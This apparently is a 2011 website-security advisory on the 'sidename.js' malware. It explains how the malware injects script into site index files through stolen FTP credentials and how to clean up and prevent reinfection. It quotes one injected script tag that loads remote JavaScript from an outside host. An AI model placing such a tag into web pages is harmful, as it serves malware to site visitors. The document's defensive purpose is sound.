June 16, 2011

The sidename.js malware places malicious JavaScript into a website's index files that access malware located on another website. The malicious code placed on the website's files can be different on each files it is placed. In some instances the malware may also host malware on an infected website with a file names sidename.js. To clean the website, the website needs to be reverted to a clean backup or the malicious code needs to be removed from the files and if the website is hosting malware that also needs to removed. The malware gains access to the website through FTP credentials that have been compromised by malware located on a computer that has accessed the website via FTP. To prevent the website from being reinfected the FTP password needs to be changed and the malware removed from the infected computer before it used again to access the website via FTP.

Recent Script Format On Web Pages:

<script src="http://pawelmakowski.pl/sidename.js"></script>

Related:

Resources

• Request a Malware Review from Google
• Request a Malware Review from Yahoo
• Request a Malware Review from Bing
• Set Up a Google Malware Warning Email Alert
• Cross-Site Malware Warning
• Unobfuscate JavaScript Malware